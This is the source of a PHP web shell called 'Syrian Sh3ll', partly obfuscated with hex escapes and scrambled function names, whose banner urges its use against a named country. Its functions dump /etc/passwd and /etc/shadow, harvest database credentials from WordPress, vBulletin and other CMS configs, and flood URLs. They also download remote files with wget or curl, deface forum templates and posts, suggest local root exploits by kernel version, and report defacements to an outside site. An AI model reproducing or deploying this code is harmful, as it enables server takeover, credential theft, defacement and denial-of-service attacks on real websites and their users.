# ____ _ _ __ _ _ _ _ _ __ _ _ _
# /_ _ _|\ \ / /| |____ \| | / \ | |\ \ ||
# (_ _ \ \/ / | |____||| | / /\ \ | | \ \ ||
# \_ _ \ \ | | |____/ | | / /--\ \ | | \ \||
# __ _) | | | | | \ \ | | / /----\ \ | | \ \|
#|_ _ _/ |__| |_| \_\|_|/_/ \_\|_| \_|
# _ _ _ _ _ _
# /_ _ _| | | | | [ ~~Syrian Sh3ll~~ ] is a php evil script , please use it against ISRAEL Only .
# (___ | |__ ___| | | Coded By : EH << SyRiAn | 34G13 <~> sy34[at]msn[dot]com
# \___ \| _ \ / _ \ | | Note : I’m Proud to be ~~SyRiAn~~
# __ _)|| | | || __/ | | Copyright (C) 2010 – ~~ syrian-shell.com ~~
#|_ _ _/|_| |_|\___|_|_| Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ] .
$uselogin = 1; // Make It 0 If you Want To Disable Auth
$user = ‘root’; // Username
$pass = ‘toor’; // Password
$kHFd4g91d = ‘#990000′; // sh3ll Color
?>
if($_GET['id'] == 100) { echo "
function showUsers() { if($rows = Exe(‘cat /etc/passwd’)) { echo $rows; } elseif($rows= Exe(‘cat /etc/domainalias’)) { echo $rows; } elseif($rows= Exe(‘cat /etc/shadow’)) { echo $rows; } elseif($rows= Exe(‘cat /var/mail’)) { echo $rows; } elseif($rows= Exe(‘cat /etc/valiases’)) { echo $rows; } elseif(file_exists(‘/etc/passwd’)) { for($uid=0;$uid<60000;$uid++) { $ORA1cgP0A = posix_getpwuid($uid); if (!empty($ORA1cgP0A)) { while (list ($key, $mLGf5g22l) = each($ORA1cgP0A)) { print "$mLGf5g22l:"; } print "\n"; } } } else { echo "[-] \x43a\x6e'\164 \123\x68\157\167 Users :( ... S\x6fr\162\171 ";} } function ddos($url, $times, $wait) { for($i = 0;$i < $times;$i++) { sleep($wait); $oGq24gO8N = curl_init($url); curl_setopt($oGq24gO8N, CURLOPT_RETURNTRANSFER, 1); $do = curl_exec($oGq24gO8N); if($do) { echo "[+][$i] \101t\x74\x61\143k\145d :: $url\n"; curl_close($oGq24gO8N); } else { echo "[-][$i] \x45\162\x72\157\162 :: $url\n"; curl_close($oGq24gO8N); } flush(); } echo "[+]=- Don\x65! -=[+]\n"; } function KidcdgPR8($afSadgZf6) { if($afSadgZf6 == "L\x69nu\170") { $KidcdgPR8 = Exe('ls -lia'); } else if ($afSadgZf6 == "\127\x69\x6e\x64\157\167\x73") { $KidcdgPR8 = Exe('dir'); } if($KidcdgPR8) { echo $KidcdgPR8; } else if(function_exists('opendir')) { if ($asX63gCnE = opendir(getcwd())) { while (false !== ($file = readdir($asX63gCnE))) { echo "$file\n"; } while ($file = readdir($asX63gCnE)) { echo "$file\n"; } closedir($asX63gCnE); } } else { $d = dir(getcwd()); echo $d->asX63gCnE . “\n”; echo $d->path . “\n”; while (false !== ($entry = $d->read())) { echo $entry.”\n”; } $d->KMf27gmaG();
} } function fYZ4g87Nj() { $connect = mysql_connect($host,$user,$pass); mysql_select_db($dbName,$connect); if($ScriptType == ‘vb’) { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $host = $config['MasterServer']['servername']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; mysql_query(“U\x50\104\x41T\x45 $hZHc0gGVI S\105T \164\x65\x6d\160l\x61t\145 = ‘”.$XnP3g6CaJ.”‘ WHE\x52\105 t\151\164le =’\x66o\x72\x75m\x68\157m\145′”); } elseif($ScriptType == ‘wp’) { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; $eZaddg7ml = $prefix.”p\x6f\163\164s” ; mysql_query(“U\x50D\x41\124\x45 $eZaddg7ml \123ET p\157s\x74_\x74i\x74\x6c\x65 =’”.$XnP3g6CaJ.”‘ \x57\110\x45\122\105 I\x44 > 0 “); } } function mso60gm0z($fileURL) { $Nhte9gJi3 = Exe(‘get ‘.$fileURL); if(!$Nhte9gJi3) { $PrMe7gVsP = Exe(‘wget ‘.$fileURL); } elseif(!$PrMe7gVsP) { $Klfe8gHIl = Exe(‘curl -o ‘.$fileURL); } elseif(!$Klfe8gHIl) { $BaCebgIMA = Exe(‘lynx -source ‘.$fileURL); } } function OdO10gEiB($file) { $rzjacgJNV = @fopen($file,’r'); if(function_exists(‘fread’)) { echo fread($rzjacgJNV,100000); } elseif(function_exists(‘fgets’)) { echo fgets($rzjacgJNV); } elseif(function_exists(‘readfile’)) { echo readfile($rzjacgJNV); } elseif(function_exists(‘file_get_contents’)) { $qFfc6gCtd = @file_get_contents($file, NULL, NULL, 0, 1000000); var_dump($qFfc6gCtd); } elseif(function_exists(‘file’)) { $qFfc6gCtd = file($file); foreach ($qFfc6gCtd as $Knk90gqYU => $COlc7gmp0) { echo $COlc7gmp0 . ”
“; } } elseif(Exe(‘cat ‘.$file.”)) { echo Exe(‘cat ‘.$file.”); } elseif(function_exists(‘include’)) { include($file); } elseif(function_exists(‘copy’)) { $tmp=tempnam(”,’cx’); copy(‘compress.zlib://’.$file,$tmp); $nUR51gYtm=fopen($tmp,’r'); $data=fread($nUR51gYtm,filesize($tmp)); fclose($nUR51gYtm); echo $data; } elseif(function_exists(‘mb_send_mail’)) { if(file_exists(‘/tmp/mb_send_mail’)) { unlink(‘/tmp/mb_send_mail’); } @mb_send_mail(NULL, NULL, NULL, NULL,’-C $file -X /tmp/mb_send_mail’); @readfile(‘/tmp/mb_send_mail’); } else if(function_exists(‘curl_init’)) { $oGq24gO8N = curl_init(“\146i\x6c\145://”.$file.”\x00″.__FILE__); var_dump(curl_exec($oGq24gO8N));
} else if(is_object($YFKfegqpb=new COM(‘WScript.Shell’))) { echo $exec=EKP28gl0K(“type ‘$file’”,$YFKfegqpb); } else if(Ack26gU3s(‘win_shell_execute’)) { echo LXqfbgk8K(“type ‘$file’”); } else if(Ack26gU3s(‘win32_create_service’)) { echo hBad6gz6P(“type ‘$file’”); } else if(function_exists(‘imap_open’)) { $Aahd7g2SB=imap_open(‘/etc/passwd’,”,”); $list=imap_list($Aahd7g2SB,$file,’*'); for($i=0;$i
} function lEIabgVDO() { $lEIabgVDO = ini_get(“o\x70\145\x6e_\x62\x61\x73\145\x64ir”); if (!$lEIabgVDO) { $lEIabgVDO = ‘OFF‘; } else { $lEIabgVDO = ‘ON‘; } return $lEIabgVDO; } function oPHd8gEm1($GsOd9gTMs) { $KmR65g2ZE=”; for ($i=0; $i < strlen($GsOd9gTMs); $i++) { $KmR65g2ZE .= dechex(ord($GsOd9gTMs[$i])); } return $KmR65g2ZE; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = 'OFF‘; } else { $safe_mode = ‘ON‘; } return $safe_mode; } function pYJ33grm9() { $pYJ33grm9 = $_SERVER["\x53\103\122\111\120\x54_\x4e\101M\105"]; $pYJ33grm9 = Explode(‘/’, $pYJ33grm9); $pYJ33grm9 = $pYJ33grm9[count($pYJ33grm9) - 1]; return $pYJ33grm9; } function Suicide() { @unlink(pYJ33grm9()); } function sAjccgBXf() { $tKff4glb4=@php_uname(); $db=array(’2.6.17′=>’prctl3, raptor_prctl, py2′,’2.6.16′=>’raptor_prctl, exp.sh, raptor, raptor2, h00lyshit’,’2.6.15′=>’py2, exp.sh, raptor, raptor2, h00lyshit’,’2.6.14′=>’raptor, raptor2, h00lyshit’,’2.6.13′=>’kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit’,’2.6.12′=>’h00lyshit’,’2.6.11′=>’krad3, krad, h00lyshit’,’2.6.10′=>’h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2′,’2.6.9′=>’exp.sh, krad3, py2, prctl3, h00lyshit’,’2.6.8′=>’h00lyshit, krad, krad2′,’2.6.7′=>’h00lyshit, krad, krad2′,’2.6.6′=>’h00lyshit, krad, krad2′,’2.6.2′=>’h00lyshit, krad, mremap_pte’,’2.6.’=>’prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak’,’2.4.29′=>’elflbl, expand_stack, stackgrow2, uselib24, smpracer’,’2.4.27′=>’elfdump, uselib24′,’2.4.25′=>’uselib24′,’2.4.24′=>’mremap_pte, loko, uselib24′,’2.4.23′=>’mremap_pte, loko, uselib24′,’2.4.22′=>’loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod’,’2.4.21′=>’w00t, brk, uselib24, loginx, brk2, ptrace-kmod’,’2.4.20′=>’mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod’,’2.4.19′=>’newlocal, w00t, ave, uselib24, loginx, kmod’,’2.4.18′=>’km2, w00t, uselib24, loginx, kmod’,’2.4.17′=>’newlocal, w00t, uselib24, loginx, kmod’,’2.4.16′=>’w00t, uselib24, loginx’,’2.4.10′=>’w00t, brk, uselib24, loginx’,’2.4.9′=>’ptrace24, uselib24′,’2.4.’=>’kmdx, remap, pwned, ptrace_kmod, ong_bak’,’2.2.25′=>’mremap_pte’,’2.2.24′=>’ptrace’,’2.2.’=>’rip, ptrace’); foreach($db as $k=>$x)if(strstr($tKff4glb4,$k))return $x; if(!$ISLffggFD)$ISLffggFD=’Not found.‘; return $ISLffggFD; } function PostgreSQL() { if(@function_exists(‘pg_connect’)) { $postgreSQL = ‘ON‘; } else { $postgreSQL = ‘OFF‘; } return $postgreSQL; } function Oracle() { if(@function_exists(‘ocilogon’)) { $oracle = ‘ON‘; } else { $oracle = ‘OFF‘; } return $oracle; } function mEb17gi81($url, $hacker, $hackmode,$eZpcbgRfC, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,”\x64\x65\146\x61\x63e\x72=”.$hacker.”&\x64\157\x6d\x61\151\x6e\x31=”. $site.”&hackmode=”.$hackmode.”&\162\145as\157\156=”.$eZpcbgRfC); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $YAC8dgsIU = curl_exec($k); curl_close($k); return $YAC8dgsIU; } function MsSQL() { if(@function_exists(‘mssql_connect’)) { $msSQL = ‘ON‘; } else { $msSQL = ‘OFF‘;
} return $msSQL; } function VcDegoLHH() { $hNSa1g9lj = function_exists(‘mysql_connect’); if($hNSa1g9lj) { $mysql = ‘ON‘; } else { $mysql = ‘OFF‘; } return $mysql; } function VSn5fgzgV($ScriptType) { if($ScriptType == ‘vb’) {return “/\x69n\143lu\x64\145\163/config.php”;} elseif($ScriptType == ‘wp’) {return “/\x77p-config.\x70hp”;} elseif($ScriptType == ‘phpbb’) {return “/config.\x70\x68p”;} elseif($ScriptType == ‘jos’) {return “/co\x6ef\151\x67\165rat\x69\x6f\156.\160h\x70″;} elseif($ScriptType == ‘ipb’) {return “/c\157n\x66_\x67l\x6f\142\141\154.p\x68\x70″;} elseif($ScriptType == ‘smf’) {return “/\x53\145tt\151ng\163.\x70\x68\160 “;} elseif($ScriptType == ‘mybb’) {return “/\151\x6e\x63/config.\x70\x68\x70 “;} } function Gzip() { if (function_exists(‘gzencode’)) { $gzip = ‘ON‘; } else { $gzip = ‘OFF‘; } return $gzip; } function MysqlI() { if (function_exists(‘mysqli_connect’)) { $mysqli = ‘ON‘; } else { $mysqli = ‘OFF‘; } return $mysqli; } function MSQL() { if (function_exists(‘msql_connect’)) { $mSql = ‘ON‘; } else { $mSql = ‘OFF‘; } return $mSql; } function zZL12gCfO() { if (function_exists(‘sqlite_open’)) { $zZL12gCfO = ‘ON‘; } else { $zZL12gCfO = ‘OFF‘; } return $zZL12gCfO; } function FXdedgZi9($file,$text) { $jzTe1gPlC = gzinflate(base64_decode($text)); if($YEX55gtMn = @fopen($file,”\167″)) { @fputs($YEX55gtMn,$jzTe1gPlC); @fclose($file); } } function mtU11g8fs() { if(ini_get(‘register_globals’)) { $Aftc9geDH= ‘ON‘; } else { $Aftc9geDH= ‘OFF‘; } return $Aftc9geDH;
} function jTtcgMMUE($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . ” \x47\102″; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . ” \x4dB”; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . ” K\102″; } else { $size = $size . ” B”; } return $size; } function Curl() { if(extension_loaded(‘curl’)) { $curl = ‘ON‘; } else { $curl = ‘OFF‘; } return $curl; } function DecryptConfig() { if(file_exists(‘DecryptConfig.php’)) { @include(“DecryptConfig.\x70\150p”); if($_POST['ScriptType'] == ‘vb’) { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $sPF99gR0p = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == ‘wp’) { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == ‘jos’) { $dbName = $db; $prefix = $MIG3cgrYi; $email = $DeI96gMN4; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == ‘phpbb’) { $host = $zzP39gi0Z; $port = $bZH3bgEIm; $dbName = $dbname; $user = $Tgl3dgYTO; $pass = $nob3agmdG; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == ‘ipb’) { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == ‘smf’) { $dbName = $db_name; $pass = $kVs36gk_Z; $prefix = $nPk37gsn6; $host = $COV38gesi; $user = $db_user; $email = $hFKf8gLCc; } elseif($_POST['ScriptType'] == ‘mybb’) { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database'];
$prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo ‘
#——————————-#
# Config Informations #
#——————————-#
Host : ‘.$host.’
DB Name : ‘.$dbName.’
DB User : ‘.$user.’
DB Pass : ‘.$pass.’
Prefix : ‘.$prefix.’
Email : ‘.$email.’
Port : ‘.$port.’
ACP : ‘.$admincp.’
MCP : ‘.$sPF99gR0p.’
‘; } else { echo “\106i\x6c\145 DecryptConfig.p\150p \x4e\157\164 E\170\151\163\164s !! “; } } function oIP58gX9b() { echo ‘
[
C0D3D By ~~ [
EH SyRiAn_34G13 ] ~~ [
]
~~ [
www.syrian-shell.com ]